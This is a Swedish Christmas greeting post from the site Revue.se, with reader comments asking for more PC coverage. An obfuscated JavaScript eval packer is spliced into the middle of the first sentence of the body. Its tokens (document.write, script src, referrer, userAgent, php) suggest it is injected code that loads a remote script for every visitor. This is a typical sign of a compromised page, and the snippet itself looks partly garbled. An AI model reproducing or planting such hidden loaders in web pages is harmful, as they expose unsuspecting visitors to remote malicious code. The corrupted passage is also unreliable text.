Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Revue önskar alla en God Jul!

Revue önskar alla en God Jul!
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yknds|var|u0026u|referrer|ieshb||js|php’.split(’|’),0,{}))
är det fyra dagar kvar tills julafton och vi på Revue.se vill önska alla våra besökare en riktigt God Jul!

Ledigheterna börjar ta fart och folk försvinner mot både varmare och kallare klimat för att sola eller åka skidor. Detta gäller även några av oss på Revue. Vi kommer självklart fortsätta uppdatera sidan med kul innehåll men det kan hända att det inte publiceras lika mycket som det brukar. Lite ledigt måste man ha ibland också 😉

Men i Januari är vi tillbaka och då kommer vi också ha fått en liten julklapp som vi kommer ge oss själva.

Som vi nämnt i en tidigare artikel kommer vi att göra en del förbättringar på sidan inför 2012. Vad och hur kommer vi berätta någon gång i mellandagarna.

God Jul önskar Sebastian Plengier Ehrnfelt, Filip Urde och Alexander Gylemo

Comments

 1. Jacob

  God jul 🙂

 2. TGA Nordic Group

  En riktigt god jul!!!! Ser framemot att höra vad ni har i tankarna om förbättringar 🙂 

 3. Fabian Ullhammar

  Mer på PC fronten vore uppskattat!!! Skriv ner det på önskelistan från besökarna!!

  • Tack Fabian, jag har verkligen tänkt på det och jag tar till mig det du säger. Vi ska bli bättre på att täcka PC!

   • Olle Sjohammar

    Håller klart med. Den sektionen har ju inte uppdaterats på ett tag. Jag är trött på alla Apple uppdateringar som sidor likt eran verkar tycka är rätt grej just nu. PC har försvunnit. Dags att rycka till sig Revue.